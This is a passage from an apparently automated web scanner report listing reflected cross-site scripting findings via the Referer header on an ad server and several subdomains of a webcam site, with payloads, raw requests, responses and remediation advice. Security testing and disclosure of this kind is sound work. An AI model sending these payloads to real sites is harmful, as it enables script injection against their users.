The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 909ef"-alert(1)-"44de56eaa23 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925? HTTP/1.1
Host: ad.doubleclick.net.57389.9231.302br.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=909ef"-alert(1)-"44de56eaa23
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6D8A06AB61E2CD22ACDBB645CBD9740D; Path=/
Content-Type: text/html
Content-Length: 7086
Date: Sat, 29 Jan 2011 01:55:06 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://www.google.com/search?hl=en&q=909ef"-alert(1)-"44de56eaa23",
   adsafeSrc : "http://ad.doubleclick.net.57389.9231.302br.net/fw/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU
...[SNIP]...

4.916. http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.doubleclick.net.57390.9231.302br.net
Path:   /jss/adj/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20871"-alert(1)-"47bce010404 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 HTTP/1.1
Host: ad.doubleclick.net.57390.9231.302br.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=20871"-alert(1)-"47bce010404

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=07CB13A74C1386A227CBF5EF34B9112E; Path=/
Content-Type: text/javascript
Content-Length: 6853
Date: Sat, 29 Jan 2011 05:20:27 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.google.com/search?hl=en&q=20871"-alert(1)-"47bce010404",
   adsafeSrc : "http://ad.doubleclick.net.57390.9231.302br.net/fw/adj/N4682.132309.BURSTMEDIA/B4421704.7",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false"
};


// use closure to keep
...[SNIP]...

4.917. http://ar.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e41c'-alert(1)-'966bdb815ef was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9e41c'-alert(1)-'966bdb815ef

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=a50m4b45qikd1i4514x4hlbg; path=/; HttpOnly
Set-Cookie: par=; expires=Thu, 27-Jan-2011 14:16:47 GMT; path=/
Set-Cookie: ASP.NET_SessionId=a50m4b45qikd1i4514x4hlbg; path=/; HttpOnly
Set-Cookie: par=; expires=Thu, 27-Jan-2011 14:16:47 GMT; path=/
Set-Cookie: spvdr=vd=4e3caa11-2c53-455d-aeb6-23456dfa827b&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:47 GMT; path=/
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:46 GMT
Connection: close
Content-Length: 18423
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=ar.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=9e41c'-alert(1)-'966bdb815ef&iy=dallas&id=44&iu=1&vd=4e3caa11-2c53-455d-aeb6-23456dfa827b';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.918. http://ar.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 803bf'-alert(1)-'0a99d8be53c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=803bf'-alert(1)-'0a99d8be53c

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ewf5ejes3cp04k55nvht3p45; path=/; HttpOnly
Set-Cookie: par=; expires=Thu, 27-Jan-2011 14:16:53 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ewf5ejes3cp04k55nvht3p45; path=/; HttpOnly
Set-Cookie: par=; expires=Thu, 27-Jan-2011 14:16:53 GMT; path=/
Set-Cookie: spvdr=vd=567a60ee-ed7f-4de5-bea0-26314350146c&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:53 GMT; path=/
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:52 GMT
Connection: close
Content-Length: 20847
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/login.aspx&he=ar.imlive.com&ul=/webcam-login/&rf=http://www.google.com/search?hl=en^q=803bf'-alert(1)-'0a99d8be53c&iy=dallas&id=44&iu=1&vd=567a60ee-ed7f-4de5-bea0-26314350146c';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.919. http://br.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27acf'-alert(1)-'861f82f4c0a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=27acf'-alert(1)-'861f82f4c0a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=nkg2nsbntcdfpjbrfiayib55; path=/; HttpOnly
Set-Cookie: pbr=; expires=Thu, 27-Jan-2011 14:16:54 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nkg2nsbntcdfpjbrfiayib55; path=/; HttpOnly
Set-Cookie: pbr=; expires=Thu, 27-Jan-2011 14:16:54 GMT; path=/
Set-Cookie: spvdr=vd=76a3aa87-b7ef-43f9-a928-b6a2beb486e7&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:54 GMT; path=/
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:54 GMT
Connection: close
Content-Length: 18277
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=br.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=27acf'-alert(1)-'861f82f4c0a&iy=dallas&id=44&iu=1&vd=76a3aa87-b7ef-43f9-a928-b6a2beb486e7';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.920. http://br.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a328'-alert(1)-'eadcfd684a2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6a328'-alert(1)-'eadcfd684a2

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=anvfcz45cym1eq45uegwmg45; path=/; HttpOnly
Set-Cookie: pbr=; expires=Thu, 27-Jan-2011 14:17:05 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=anvfcz45cym1eq45uegwmg45; path=/; HttpOnly
Set-Cookie: pbr=; expires=Thu, 27-Jan-2011 14:17:05 GMT; path=/
Set-Cookie: spvdr=vd=c9a4e47e-04fb-49d0-a02e-72013ee5baf4&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:05 GMT; path=/
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:04 GMT
Connection: close
Content-Length: 20745
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/login.aspx&he=br.imlive.com&ul=/webcam-login/&rf=http://www.google.com/search?hl=en^q=6a328'-alert(1)-'eadcfd684a2&iy=dallas&id=44&iu=1&vd=c9a4e47e-04fb-49d0-a02e-72013ee5baf4';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.921. http://cafr.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97e0d'-alert(1)-'85ef759ec87 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=97e0d'-alert(1)-'85ef759ec87

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=abjerb55miue1jybuviox355; path=/; HttpOnly
Set-Cookie: pcafr=; expires=Thu, 27-Jan-2011 14:16:56 GMT; path=/
Set-Cookie: ASP.NET_SessionId=abjerb55miue1jybuviox355; path=/; HttpOnly
Set-Cookie: pcafr=; expires=Thu, 27-Jan-2011 14:16:56 GMT; path=/
Set-Cookie: spvdr=vd=b251e2ee-c181-407f-9403-d9aeab43a548&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:56 GMT; path=/
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:55 GMT
Connection: close
Content-Length: 18800
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=cafr.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=97e0d'-alert(1)-'85ef759ec87&iy=dallas&id=44&iu=1&vd=b251e2ee-c181-407f-9403-d9aeab43a548';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.922. http://cafr.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9536b'-alert(1)-'e58569d4bd5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9536b'-alert(1)-'e58569d4bd5

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=jrzbde55yhvkm0yd0wajeo55; path=/; HttpOnly
Set-Cookie: pcafr=; expires=Thu, 27-Jan-2011 14:17:03 GMT; path=/
Set-Cookie: ASP.NET_SessionId=jrzbde55yhvkm0yd0wajeo55; path=/; HttpOnly
Set-Cookie: pcafr=; expires=Thu, 27-Jan-2011 14:17:03 GMT; path=/
Set-Cookie: spvdr=vd=6a0168f5-b4e1-4005-82b3-4d8109481900&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:03 GMT; path=/
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:03 GMT
Connection: close
Content-Length: 220503
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/hostlist.ashx&he=cafr.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=9536b'-alert(1)-'e58569d4bd5&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=6a0168f5-b4e1-4005-82b3-4d8109481900';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.923. http://de.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6236'-alert(1)-'6b063b5f82a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e6236'-alert(1)-'6b063b5f82a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=wmkuv23dire3y5455dflznbk; path=/; HttpOnly
Set-Cookie: pde=; expires=Thu, 27-Jan-2011 14:17:00 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wmkuv23dire3y5455dflznbk; path=/; HttpOnly
Set-Cookie: pde=; expires=Thu, 27-Jan-2011 14:17:00 GMT; path=/
Set-Cookie: spvdr=vd=4e0a90f8-4f17-4e29-82a0-f518b35446a3&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:00 GMT; path=/
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:00 GMT
Connection: close
Content-Length: 18350
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=de.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=e6236'-alert(1)-'6b063b5f82a&iu=1&vd=4e0a90f8-4f17-4e29-82a0-f518b35446a3';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typeof obj.addEvent
...[SNIP]...

4.924. http://de.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e45d9'-alert(1)-'4b50bf8581f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e45d9'-alert(1)-'4b50bf8581f

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=go54xq451damzdiseidhmr55; path=/; HttpOnly
Set-Cookie: pde=; expires=Thu, 27-Jan-2011 14:17:05 GMT; path=/
Set-Cookie: ASP.NET_SessionId=go54xq451damzdiseidhmr55; path=/; HttpOnly
Set-Cookie: pde=; expires=Thu, 27-Jan-2011 14:17:05 GMT; path=/
Set-Cookie: spvdr=vd=07626285-c0ff-437f-958c-dcbbd088dd7f&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:05 GMT; path=/
Set-Cookie: ide=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:05 GMT
Connection: close
Content-Length: 169257
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
